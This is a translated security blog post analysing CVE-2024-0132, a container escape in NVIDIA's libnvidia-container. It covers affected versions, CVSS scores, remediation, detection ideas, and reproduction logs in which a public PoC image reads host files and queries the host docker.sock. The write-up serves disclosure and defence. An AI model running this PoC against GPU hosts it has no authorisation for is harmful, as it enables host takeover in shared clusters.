The First GPU Container Escape: An Analysis of NVIDIA Container Toolkit CVE-2024-0132
Original article by ssst0n3, 石头的安全料理屋 (Stone's Security Kitchen), 2025-02-13 13:00
I. Basic Information
II. Component Overview
The vulnerability lies in libnvidia-container.so, the library used by nvidia-container-cli; both belong to the libnvidia-container project. Together with other related tools, libnvidia-container makes up the NVIDIA Container Toolkit.
The NVIDIA Container Toolkit is a suite of tools from NVIDIA for GPU-accelerated computing in containerized environments. It allows users to access NVIDIA GPUs from container platforms such as Docker, so that GPU-dependent workloads such as deep learning training, inference, and scientific computing can run inside containers.
- libnvidia-container: the low-level library that integrates with container runtimes and is responsible for mounting GPU devices, drivers, and CUDA libraries into containers.
- nvidia-container-runtime: a container runtime that extends the standard OCI (Open Container Initiative) runtime with GPU acceleration support.
- nvidia-docker2 (deprecated): the early plugin for using NVIDIA GPUs in Docker containers, since replaced by the NVIDIA Container Toolkit.
III. Vulnerability Authors
1. Discoverers
1.1 Shir Tamari
Shir Tamari is an experienced security and technology researcher focused on vulnerability research and practical hacking techniques. A veteran of the Israel Defense Forces, he is currently Head of Research at the cloud security company Wiz. He has previously consulted for multiple security companies in research, development, and product roles. He has discovered a number of well-known vulnerabilities in the cloud security space and is one of the authors of the nvidia-container-toolkit container escape CVE-2024-0132.
1.2 Ronen Shustin (ID: Ronen)
Ronen Shustin is an experienced vulnerability researcher focused on cloud security who has worked at well-known organizations including Wiz, Check Point, and Israel's Unit 8200. Ronen has discovered and reported significant security vulnerabilities across multiple cloud platforms, including the libnvidia-container container escape CVE-2024-0132 and issues in Azure PostgreSQL, GCP Cloud SQL, and IBM Cloud Databases for PostgreSQL. He has spoken at several security conferences on cloud security and Kubernetes cluster security, and has appeared repeatedly on the Microsoft Security Response Center's security researcher leaderboard.
1.3 Andres Riancho (ID: andresriancho)
Andrés Riancho is an expert in offensive application security and in training developers to write secure code. He was Director of Web Security at Rapid7, where he led the team that improved NeXpose's web application scanner. He is the creator of w3af, an open-source web application security scanner that helps users identify and exploit vulnerabilities in web applications. He has also provided professional security consulting to Latin American unicorns such as MercadoLibre and Despegar. Andrés enjoys speaking at security and developer conferences around the world, sharing his experience in web application security, exploitation, and cloud security. He currently lives in Buenos Aires, Argentina, and provides professional services globally.
2. Introducer: Jonathan Calmels (ID: 3XX0)
Jonathan Calmels is a systems software engineer at NVIDIA. His work focuses on GPU data-center software and hyperscale solutions for deep learning.
3. Fixer: Evan Lezar (ID: elezar)
Evan Lezar is an experienced software engineer with both commercial and academic backgrounds, with over a decade of experience across multiple programming languages, roles, and team configurations. Evan works at NVIDIA. He specializes in GPU acceleration with NVIDIA CUDA in the field of computational electromagnetics, has published several papers on the topic, and has participated in multiple international conferences. He also actively contributes to open-source projects related to NVIDIA GPU management, Kubernetes, and container technology. His research results have advanced academia and found wide application in industry.
IV. Vulnerability Details
1. Introduction
1.1 Background: CUDA Forward Compatibility
libnvidia-container supports CUDA Forward Compatibility, which allows a container to use CUDA libraries newer than the host driver, so that containerized CUDA applications can run on newer CUDA versions without updating the NVIDIA driver on the host. This is very useful for containerized applications that need new features or newer CUDA releases, while preserving compatibility and stability with the host system.
Concretely, libnvidia-container mounts the newer CUDA libraries found under the container's /usr/local/cuda/compat directory into the container's lib directory.
1.2 The Vulnerability
When handling the CUDA forward-compatibility feature, the NVIDIA Container Toolkit library libnvidia-container mounts files from the container's /usr/local/cuda/compat directory into the container's lib directory (e.g. /usr/lib/x86_64-linux-gnu/). The mount operation is subject to a symlink attack, which allows an arbitrary host directory to be mounted read-only into the container and, from there, a full container escape.
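libnvidia-container itself is written in C; the following Python snippet is only a minimal sketch of the vulnerable pattern and of the containment check a fix needs. The function names are illustrative, not taken from the real code base.

```python
import os

def naive_mount_source(rootfs, rel_path):
    # Vulnerable pattern: trust the container-controlled path and follow
    # symlinks blindly. A symlink shipped inside the image can therefore
    # redirect the mount source to an arbitrary host path.
    return os.path.realpath(os.path.join(rootfs, rel_path))

def safe_mount_source(rootfs, rel_path):
    # Hardened pattern: resolve the path, then verify the result is still
    # inside the container rootfs before using it as a mount source.
    base = os.path.realpath(rootfs)
    real = os.path.realpath(os.path.join(rootfs, rel_path))
    if real != base and not real.startswith(base + os.sep):
        raise ValueError("path escapes container rootfs: " + real)
    return real
```

If an image ships /usr/local/cuda/compat as a symlink to /, the naive variant happily returns the host root as the mount source; that is exactly the class of bug at work here.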
2. Impact
2.1 Affected Versions
libnvidia-container >= 1.0.0, <= 1.16.1
For detailed measurements, see: https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
nvidia-container-toolkit and gpu-operator are affected because they depend on libnvidia-container.
nvidia-container-toolkit supports three modes:
- legacy: the default configuration; affected.
- cdi: can be enabled manually; not affected.
- csv: can be enabled manually; not affected. (This mode mainly targets Tegra-based systems without NVML. NVIDIA provides no detailed usage guide for it, so very few users are expected to use it; csv mode requires users to manually specify the files and devices to mount and does not involve the affected feature.)
2.2 Severity
An arbitrary host directory can be mounted read-only into the container; files such as docker.sock then allow the container API to be invoked, achieving container escape.
2.2.1 CVSS3.1 8.6 (by ssst0n3)
8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
2.2.2 CVSS3.1 9.0 (by NVIDIA)
9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
2.2.3 CVSS3.1 8.3 (by NIST:NVD)
8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
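The three vectors above share the same impact metrics (S:C/C:H/I:H/A:H) and differ only in attack vector, attack complexity, and privileges required. The arithmetic itself is fixed by the CVSS v3.1 specification; the sketch below implements only the base-score formula, to show how each vector yields its number.

```python
import math

def roundup(x):
    # CVSS "Roundup": the smallest number with one decimal place >= x.
    return math.ceil(x * 10) / 10

def base_score(vector):
    # Parse "CVSS:3.1/AV:L/AC:L/..." into a metric -> value dict.
    m = dict(part.split(":") for part in vector.split("/")[1:])
    av = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}[m["AV"]]
    ac = {"L": 0.77, "H": 0.44}[m["AC"]]
    ui = {"N": 0.85, "R": 0.62}[m["UI"]]
    changed = m["S"] == "C"
    # Privileges-required weight depends on whether scope is changed.
    pr = ({"N": 0.85, "L": 0.68, "H": 0.5} if changed
          else {"N": 0.85, "L": 0.62, "H": 0.27})[m["PR"]]
    cia = {"H": 0.56, "L": 0.22, "N": 0.0}
    iss = 1 - (1 - cia[m["C"]]) * (1 - cia[m["I"]]) * (1 - cia[m["A"]])
    impact = (7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15 if changed
              else 6.42 * iss)
    exploitability = 8.22 * av * ac * pr * ui
    if impact <= 0:
        return 0.0
    return roundup(min(1.08 * (impact + exploitability) if changed
                       else impact + exploitability, 10))
```

Feeding the three vectors above into this function reproduces the 8.6, 9.0, and 8.3 scores respectively.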
2.3 Exploitation Scenarios
The vulnerability affects services that allow users to run arbitrary images with NVIDIA GPU access inside containers.
V. Defense
1. Checking Whether You Are Affected
The following commands confirm whether an affected version is in use.
(1) Check whether /etc/docker/daemon.json or /etc/containerd/config.toml contains an nvidia entry.
The following example shows that the NVIDIA Container Toolkit is in use:
root@localhost:~# cat /etc/docker/daemon.json | grep nvidia
        "nvidia": {
            "path": "nvidia-container-runtime"
root@localhost:~# cat /etc/containerd/config.toml | grep nvidia
    "/usr/bin/nvidia-container-runtime"
(2) Run commands such as nvidia-container-runtime --version.
The following example shows version 1.16.2, which is not affected by this vulnerability:
root@localhost:~# nvidia-container-runtime --version
NVIDIA Container Runtime version 1.16.2
commit: a5a5833c14a15fd9c86bcece85d5ec6621b65652
spec: 1.2.0

runc version 1.1.12-0ubuntu2~22.04.1
spec: 1.0.2-dev
go: go1.21.1
libseccomp: 2.5.3
2. Remediation
NVIDIA has released a fix; upgrading to v1.16.2 or later resolves the issue.
See the official installation guide: https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
3. Mitigations
- Avoid running untrusted images.
- Alternatively, use GPUs via CDI; see the official documentation: https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html
4. Detecting Exploitation
(1) Exploitation involves a mount system call, which can be detected by inspecting the syscall's arguments. (2) Alternatively, detect container processes accessing host files.
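As one illustration of approach (2), the heuristic below (my own sketch, not a production detector) parses a container process's /proc/&lt;pid&gt;/mountinfo and flags read-only mounts whose mount root does not come from /usr/local/cuda, which is what the legitimate forward-compat mounts look like.

```python
def suspicious_mounts(mountinfo_text):
    """Flag read-only mounts whose root is outside /usr/local/cuda.

    Illustrative heuristic only: a legitimate forward-compat mount has a
    root like /usr/local/cuda-12.6/compat/libcuda.so..., while an
    exploited mount typically carries a host path (often "/") as its root.
    """
    flagged = []
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        # mountinfo fields: id, parent, major:minor, root, mount point, options, ...
        root, mount_point, options = fields[3], fields[4], fields[5]
        read_only = "ro" in options.split(",")
        legit = root.startswith("/usr/local/cuda")
        if read_only and not legit:
            flagged.append((root, mount_point))
    return flagged
```

A real detector would also need to scope this to mounts created by the toolkit's hook and tolerate other intentional read-only bind mounts.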
VI. Reproduction
1. nvidia-container-toolkit
- Environment: Huawei Cloud Hong Kong ECS (Ubuntu 22.04, NVIDIA driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
- Steps: run the PoC image.
- Expected result: host files are accessible from inside the container, and the Docker API can be invoked via docker.sock.
For impact measurements across more versions, see https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
1.1 Environment
I purchased a Huawei Cloud Hong Kong ECS with the following configuration:
- Billing mode: pay-per-use
- Region/AZ: CN-Hong Kong | randomly assigned
- Instance flavor: GPU-accelerated | pi2.2xlarge.4 | 8 vCPUs | 32 GiB | GPU: 1 × NVIDIA Tesla T4 / 1 × 16 GiB
- OS image: Ubuntu 22.04 server 64bit with Tesla Driver 470.223.02 and CUDA 11.4
$ ssh wanglei-gpu3
root@wanglei-gpu3:~# nvidia-smi
Tue Oct 15 11:13:33 2024
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   30C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
Next, install docker and nvidia-container-toolkit:
root@wanglei-gpu3:~# apt update && apt install docker.io -y
root@wanglei-gpu3:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
  && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu3:~# apt-get update && \
  apt-get install -y libnvidia-container1=1.16.1-1 \
    libnvidia-container-tools=1.16.1-1 \
    nvidia-container-toolkit-base=1.16.1-1 \
    nvidia-container-toolkit=1.16.1-1
Configure the nvidia container runtime:
root@wanglei-gpu3:~# nvidia-ctk runtime configure --runtime=docker
WARN[0000] Ignoring runtime-config-override flag for docker
INFO[0000] Config file does not exist; using empty config
INFO[0000] Wrote updated config to /etc/docker/daemon.json
INFO[0000] It is recommended that docker daemon be restarted.
root@wanglei-gpu3:~# systemctl restart docker
Environment information:
root@wanglei-gpu3:~# nvidia-container-cli --version
cli-version: 1.16.1
lib-version: 1.16.1
build date: 2024-07-23T14:57+00:00
build revision: 4c2494f16573b585788a42e9c7bee76ecd48c73d
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu3:~#
root@wanglei-gpu3:~# nvidia-container-cli info
NVRM version:   470.223.02
CUDA version:   11.4
Device Index:   0
Device Minor:   0
Model:          Tesla T4
Brand:          Nvidia
GPU UUID:       GPU-03ef96a1-75d6-9917-ed12-4db7f79bfa4b
Bus Location:   00000000:00:0d.0
Architecture:   7.5
root@wanglei-gpu3:~#
root@wanglei-gpu3:~# docker info
Client:
 Version:    24.0.7
 Context:    default
 Debug Mode: false
Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 0
 Server Version: 24.0.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 nvidia runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version:
 runc version:
 init version:
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 5.15.0-76-generic
 Operating System: Ubuntu 22.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 8
 Total Memory: 31.15GiB
 Name: wanglei-gpu3
 ID: bc9d2464-60ee-458d-93a0-fab77847a4b3
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false
1.2 Reproducing the Vulnerability
Use the pre-built PoC image ssst0n3/poc-cve-2024-0132, or build it yourself:
root@wanglei-gpu3:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu3:~# cd poc-cve-2024-0132
root@wanglei-gpu3:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
...
root@wanglei-gpu3:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-gpu3
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"6dac93a4b9aaa6e2db5bed64f550d111e6e9604375e3210b46b59b095635290f","Names":["/nifty_booth"],"Image":"ssst0n3/poc-cve-2024-0132","ImageID":"sha256:53f3d5c92e144343851ec800aa7a0af201517262498519cc4dfd53688da9b112","Command":"/bin/sh -c /entrypoint.sh","Created":1728996664,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"72649d2ea91c5c657b26de4af617b491e8f09bf9c2e5e8a44695ff10e68191b6","EndpointID":"be81eb91bfafd69bb442f3ccf9790ff5da9ae9ef42ad643aa4a686c3040f404b","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
2. gpu-operator
- Environment: Huawei Cloud Hong Kong CCE Standard (k8s v1.30) + docker v24.0.9 + gpu-operator v24.6.1
- Steps: run the PoC image.
- Expected result: host files are accessible from inside the container, and the Docker API can be invoked via docker.sock.
The purpose of testing gpu-operator is to demonstrate that it is affected because of the nvidia-container-toolkit it installs; other gpu-operator versions were therefore not measured.
2.1 Environment
I purchased a Huawei Cloud Hong Kong CCE cluster with the following configuration:
- Billing mode: pay-per-use
- Cluster version: v1.30
- Added node:
  - Billing mode: pay-per-use
  - Region/AZ: CN-Hong Kong | randomly assigned
  - Instance flavor: GPU-accelerated | pi2.2xlarge.4 | 8 vCPUs | 32 GiB | GPU: 1 × NVIDIA Tesla T4 / 1 × 16 GiB
  - Image: Ubuntu 22.04
root@wanglei-k8s-gpu-02862:~# lspci | grep NVIDIA
00:0d.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)
Next, install gpu-operator:
$ scp wanglei-k8s-gpu-kubeconfig.yaml wanglei-k8s-gpu-02862:
$ ssh wanglei-k8s-gpu-02862
root@wanglei-k8s-gpu-02862:~# curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3 && chmod 700 get_helm.sh && ./get_helm.sh
Downloading https://get.helm.sh/helm-v3.16.3-linux-amd64.tar.gz
Verifying checksum... Done.
Preparing to install helm into /usr/local/bin
helm installed into /usr/local/bin/helm
root@wanglei-k8s-gpu-02862:~# helm repo add nvidia https://helm.ngc.nvidia.com/nvidia && helm repo update
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
"nvidia" has been added to your repositories
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "nvidia" chart repository
Update Complete. ⎈Happy Helming!⎈
root@wanglei-k8s-gpu-02862:~# helm install --wait --generate-name -n gpu-operator --create-namespace nvidia/gpu-operator --version=v24.6.1
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
NAME: gpu-operator-1733143549
LAST DEPLOYED: Mon Dec  2 20:45:52 2024
NAMESPACE: gpu-operator
STATUS: deployed
REVISION: 1
TEST SUITE: None
I hit an Init:CrashLoopBackOff error for unclear reasons; deleting the pod and waiting for it to be recreated resolved it.
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME                                                              READY   STATUS                  RESTARTS      AGE
gpu-feature-discovery-nmz44                                       0/1     Init:0/1                0             4m42s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv   1/1     Running                 0             6m3s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8   1/1     Running                 0             6m3s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp       1/1     Running                 0             6m3s
gpu-operator-77fdfcd757-4gxq4                                     1/1     Running                 0             6m3s
nvidia-container-toolkit-daemonset-xnfjx                          1/1     Running                 0             4m42s
nvidia-dcgm-exporter-9d8bp                                        0/1     Init:0/1                0             4m42s
nvidia-device-plugin-daemonset-dz84j                              0/1     Init:0/1                0             4m42s
nvidia-driver-daemonset-w2xmw                                     1/1     Running                 0             5m33s
nvidia-operator-validator-kjc2x                                   0/1     Init:CrashLoopBackOff   3 (23s ago)   4m42s
root@wanglei-k8s-gpu-02862:~# kubectl delete pod -n gpu-operator nvidia-operator-validator-kjc2x
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME                                                              READY   STATUS      RESTARTS   AGE
gpu-feature-discovery-nmz44                                       1/1     Running     0          8m7s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv   1/1     Running     0          9m28s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8   1/1     Running     0          9m28s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp       1/1     Running     0          9m28s
gpu-operator-77fdfcd757-4gxq4                                     1/1     Running     0          9m28s
nvidia-container-toolkit-daemonset-xnfjx                          1/1     Running     0          8m7s
nvidia-cuda-validator-895qp                                       0/1     Completed   0          2m15s
nvidia-dcgm-exporter-9d8bp                                        1/1     Running     0          8m7s
nvidia-device-plugin-daemonset-2s7z2                              1/1     Running     0          22s
nvidia-driver-daemonset-w2xmw                                     1/1     Running     0          8m58s
nvidia-operator-validator-gd74c                                   1/1     Running     0          2m17s
Environment information:
root@wanglei-k8s-gpu-02862:~# kubectl exec -n gpu-operator nvidia-driver-daemonset-w2xmw nvidia-smi
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Mon Dec  2 12:57:22 2024
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.90.07          Driver Version: 550.90.07          CUDA Version: 12.4     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|=========================================+========================+======================|
|   0  Tesla T4                       On  |   00000000:00:0D.0 Off |                    0 |
| N/A   28C    P8              9W /  70W  |       1MiB /  15360MiB |      0%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+

+-----------------------------------------------------------------------------------------+
| Processes:                                                                              |
|  GPU   GI   CI        PID   Type   Process name                              GPU Memory |
|        ID   ID                                                               Usage      |
|=========================================================================================|
|  No running processes found                                                             |
+-----------------------------------------------------------------------------------------+
2.2 Reproducing the Vulnerability
root@wanglei-k8s-gpu-02862:~# cat poc-cve-2024-0132.yaml
apiVersion: v1
kind: Pod
metadata:
  name: poc-cve-2024-0132
spec:
  restartPolicy: OnFailure
  containers:
    - name: poc-cve-2024-0132
      image: "docker.io/ssst0n3/poc-cve-2024-0132:latest"
      imagePullPolicy: IfNotPresent
      resources:
        limits:
          nvidia.com/gpu: 1
root@wanglei-k8s-gpu-02862:~# kubectl apply -f poc-cve-2024-0132.yaml
pod/poc-cve-2024-0132 created
root@wanglei-k8s-gpu-02862:~# kubectl logs poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-k8s-gpu-02862
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 77281    0 77281    0     0  12.6M      0 --:--:-- --:--:-- --:--:-- 14.7M
[{"Id":"5106c279c3a900712370fccaf6d0ee5e8cb40673ca5886a75a9265f7853e5f05","Names":["/k8s_poc-cve-2024-0132_poc-cve-2024-0132_default_09203b3a-10e4-490a-8f86-abdc1b36c8ae_0"],"Image":"sha256:5fa3c2349168a5c8b3927907399ba19e500d8d86e5c84315...
3. nvidia-container-toolkit (CDI mode): Not Affected
- Environment: Huawei Cloud Hong Kong ECS (Ubuntu 22.04, NVIDIA driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
- Steps: run the PoC image.
- Tested-for result: host files accessible from inside the container, and the Docker API invocable via docker.sock (not achieved in this mode; see 3.2).
3.1 Environment
The environment is the same as in section 1.1. Following section 1.1:
- install docker and nvidia-container-toolkit
- configure the container runtime
$ apt update && apt install docker.io -y
$ curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
  && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
$ apt-get update && \
  apt-get install -y libnvidia-container1=1.16.1-1 \
    libnvidia-container-tools=1.16.1-1 \
    nvidia-container-toolkit-base=1.16.1-1 \
    nvidia-container-toolkit=1.16.1-1
$ nvidia-ctk runtime configure --runtime=docker
$ systemctl restart docker
After installation, set up CDI mode:
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
3.2 Attempted Reproduction: Not Exploitable
root@wanglei-gpu:~# docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ssst0n3/poc-cve-2024-0132:latest
+ cat /host/etc/hostname
cat: /host/etc/hostname: Not a directory
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
curl: (7) Failed to connect to localhost port 80 after 0 ms: Couldn't connect to server
VII. Vulnerability Analysis
1. Analysis of the Original Feature
1.1 Using NVIDIA GPUs in Containers
Refer to the official documentation for installing and using NVIDIA GPU containers. nvidia-container-toolkit uses a runc hook to mount the necessary drivers before the container starts.
- https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
- https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/sample-workload.html
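For reference, the hook injected by nvidia-container-runtime ends up in the container's OCI config.json roughly like this (an illustrative fragment; exact fields vary by version):

```json
{
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": ["nvidia-container-runtime-hook", "prestart"]
      }
    ]
  }
}
```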
$ docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   29C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
1.2 The nvidia-container-toolkit CUDA Forward-Compatibility Feature
- Forward compatibility: in computer science and software engineering, forward compatibility is the ability of a system, product, or standard to work with future versions; that is, existing software or hardware keeps functioning after future updates. Example: a program compiled against an old version runs in a newer environment.
- Backward compatibility: the ability of a new version of a system, product, or standard to work with components of older versions. Example: a new version of a piece of software can read data files produced by an old version.
NVIDIA's official "CUDA Compatibility Guide" (https://docs.nvidia.com/deploy/cuda-compatibility/index.html) explicitly describes CUDA's forward compatibility, emphasizing that applications can run on future versions of CUDA drivers and hardware:
★
“Forward Compatibility: Applications compiled on an earlier CUDA toolkit version can run on newer CUDA drivers and, in some cases, newer GPUs.”
NVIDIA's documentation also notes that the CUDA Runtime provides compatibility guarantees that allow applications to run on systems with newer drivers:
★
“The CUDA runtime built into the CUDA driver guarantees binary compatibility and backward compatibility. Applications compiled against a particular version of the CUDA runtime can therefore run without recompilation on newer CUDA-capable GPUs and on systems with newer drivers.”
Concretely, libnvidia-container mounts the newer CUDA libraries under the container's /usr/local/cuda/compat directory into the container's lib directory.
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 cat /proc/self/mountinfo | grep compat
677 652 0:48 /usr/local/cuda-12.6/compat/libcuda.so.560.35.03 /usr/lib/x86_64-linux-gnu/libcuda.so.560.35.03 ro,nosuid,nodev,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/7PESVCWGEYV5EAUFQQOU54JC5I:/var/lib/docker/overlay2/l/PIMQYFKPYMVGLM7JIYDNWWQNMV:/var/lib/docker/overlay2/l/BOOUOLOLY4GM525O7PGZYXHWAR:/var/lib/docker/overlay2/l/JFDVXPNFZHK6MO35W275FXWJK2:/var/lib/docker/overlay2/l/DHPPA554ZRQ3RMXBAC4TCQ2ONI:/var/lib/docker/overlay2/l/7VXIOP6JUX5AQWZDCES4OSMUE3:/var/lib/docker/overlay2/l/VXIMXECSGJPSZSTCV4L3F5SSVF:/var/lib/docker/overlay2/l/GNHB2U3KK74XBRHDNTTRBPLO5V:/var/lib/docker/overlay2/l/CPLKLXQBHMU2HSD2KH7QST3XPC:/var/lib/docker/overlay2/l/5I4CMPNMDVNB4OH6B3LTCLKUX5:/var/lib/docker/overlay2/l/MZVFHZWHWZ6WESPEACUAGYRIW2,upperdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/diff,workdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/work
...
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 nvidia-smi

============ CUDA ============

CUDA Version 12.6.2

Container image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
This container image and its contents are governed by the NVIDIA Deep Learning Container License.
By pulling and using the container, you accept the terms and conditions of this license:
https://developer.nvidia.com/ngc/nvidia-deep-learning-container-license
A copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.

Tue Nov 26 12:40:00 2024
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 12.6     |
|-------------------------------+----------------------+----------------------+
